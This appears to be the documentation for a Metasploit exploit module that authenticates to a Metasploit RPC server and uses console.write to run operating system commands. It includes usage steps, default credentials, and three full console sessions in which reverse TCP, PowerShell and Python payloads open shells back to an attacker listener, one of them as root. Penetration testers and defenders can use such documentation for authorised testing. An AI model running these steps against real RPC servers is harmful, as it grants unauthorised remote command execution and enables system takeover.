## Description

  This module connects to a specified Metasploit RPC server and uses the *console.write* procedure to execute operating system commands. Valid credentials are required to access the RPC interface.


## Vulnerable Application

  [Metasploit](https://www.rapid7.com/products/metasploit/) is the world's most used penetration testing software. The RPC API can be used to programmatically drive the Metasploit Framework and Metasploit Pro products.

  To start the RPC service, run `msfrpcd -U msf -P abc123`; or run `load msgrpc ServerHost=0.0.0.0 ServerPort=55552 User=msf Pass=abc123 SSL=Y` from within msfconsole.

  This module has been tested successfully on:

  * Metasploit 4.15 on Kali 1.0.6
  * Metasploit 4.14 on Kali 2017.1
  * Metasploit 4.14 on Windows 7 SP1

  Source and Installers:

  * [Source Code Repository](https://github.com/rapid7/metasploit-framework)
  * [Installers](https://github.com/rapid7/metasploit-framework/wiki/Downloads-by-Version)

## Verification Steps

  1. Start `msfconsole`
  2. Do: `use exploit/multi/misc/msf_rpc_console`
  3. Do: `set RHOST [IP]`
  4. Do: `set RPORT [PORT]` (default: `55552`)
  5. Do: `set USERNAME [USERNAME]` (default: `msf`)
  6. Do: `set PASSWORD [PASSWORD]`
  7. Do: `set LHOST [IP]`
  8. Do: `run`
  9. You should get a session


## Options

  **Username**

  The username for Metasploit RPC (default: `msf`).

  **Password**

  The password for the RPC user.


## Scenarios

### Ruby Target

  ```
  msf > use exploit/multi/misc/msf_rpc_console 
  msf exploit(msf_rpc_console) > set rhost 172.16.191.166
  rhost => 172.16.191.166
  msf exploit(msf_rpc_console) > set username msf
  username => msf
  msf exploit(msf_rpc_console) > set password abc123
  password => abc123
  msf exploit(msf_rpc_console) > set lhost 172.16.191.181
  lhost => 172.16.191.181
  msf exploit(msf_rpc_console) > set target 0
  target => 0
  msf exploit(msf_rpc_console) > run

  [*] Started reverse TCP handler on 172.16.191.181:4444 
  [+] 172.16.191.166:55552 - Authenticated successfully
  [*] 172.16.191.166:55552 - Metasploit 4.14.28-dev
  [*] 172.16.191.166:55552 - Ruby 2.3.3 x64-mingw32 2016-11-21
  [*] 172.16.191.166:55552 - API version 1.0
  [+] 172.16.191.166:55552 - Created console #0
  [*] 172.16.191.166:55552 - Sending payload...
  [*] Command shell session 1 opened (172.16.191.181:4444 -> 172.16.191.166:52984) at 2017-07-05 03:40:50 -0400

  whoami
  win-sgbsd5tqutq\user
  ```

### Windows CMD Target

  ```
  msf > use exploit/multi/misc/msf_rpc_console 
  msf exploit(msf_rpc_console) > set rhost 172.16.191.166
  rhost => 172.16.191.166
  msf exploit(msf_rpc_console) > set username msf
  username => msf
  msf exploit(msf_rpc_console) > set password abc123
  password => abc123
  msf exploit(msf_rpc_console) > set lhost 172.16.191.181
  lhost => 172.16.191.181
  msf exploit(msf_rpc_console) > set target 0
  target => 1
  msf exploit(msf_rpc_console) > set payload cmd/windows/powershell_reverse_tcp 
  payload => cmd/windows/powershell_reverse_tcp
  msf exploit(msf_rpc_console) > run

  [*] Started reverse SSL handler on 172.16.191.181:4444 
  [+] 172.16.191.166:55552 - Authenticated successfully
  [*] 172.16.191.166:55552 - Metasploit 4.14.28-dev
  [*] 172.16.191.166:55552 - Ruby 2.3.3 x64-mingw32 2016-11-21
  [*] 172.16.191.166:55552 - API version 1.0
  [+] 172.16.191.166:55552 - Created console #1
  [*] 172.16.191.166:55552 - Sending payload...
  [*] Powershell session session 2 opened (172.16.191.181:4444 -> 172.16.191.166:52996) at 2017-07-05 03:44:05 -0400

  Windows PowerShell running as user user on WIN-SGBSD5TQUTQ
  Copyright (C) 2015 Microsoft Corporation. All rights reserved.

  PS C:\metasploit>whoami
  win-sgbsd5tqutq\user
  ```

### Unix CMD Target

  ```
  msf > use exploit/multi/misc/msf_rpc_console 
  msf exploit(msf_rpc_console) > set rhost 172.16.191.215
  rhost => 172.16.191.215
  msf exploit(msf_rpc_console) > set username msf
  username => msf
  msf exploit(msf_rpc_console) > set password abc123
  password => abc123
  msf exploit(msf_rpc_console) > set lhost 172.16.191.181
  lhost => 172.16.191.181
  msf exploit(msf_rpc_console) > set target 2
  target => 2
  msf exploit(msf_rpc_console) > set payload cmd/unix/reverse_python
  payload => cmd/unix/reverse_python
  msf exploit(msf_rpc_console) > run

  [*] Started reverse TCP handler on 172.16.191.181:4444 
  [+] 172.16.191.215:55552 - Authenticated successfully
  [*] 172.16.191.215:55552 - Metasploit 4.15.0-dev-aceeedc
  [*] 172.16.191.215:55552 - Ruby 2.3.0 x86_64-linux 2015-12-25
  [*] 172.16.191.215:55552 - API version 1.0
  [+] 172.16.191.215:55552 - Created console #0
  [*] 172.16.191.215:55552 - Sending payload...
  [*] Command shell session 3 opened (172.16.191.181:4444 -> 172.16.191.215:40768) at 2017-07-05 03:46:11 -0400

  id
  uid=0(root) gid=0(root) groups=0(root)
  ```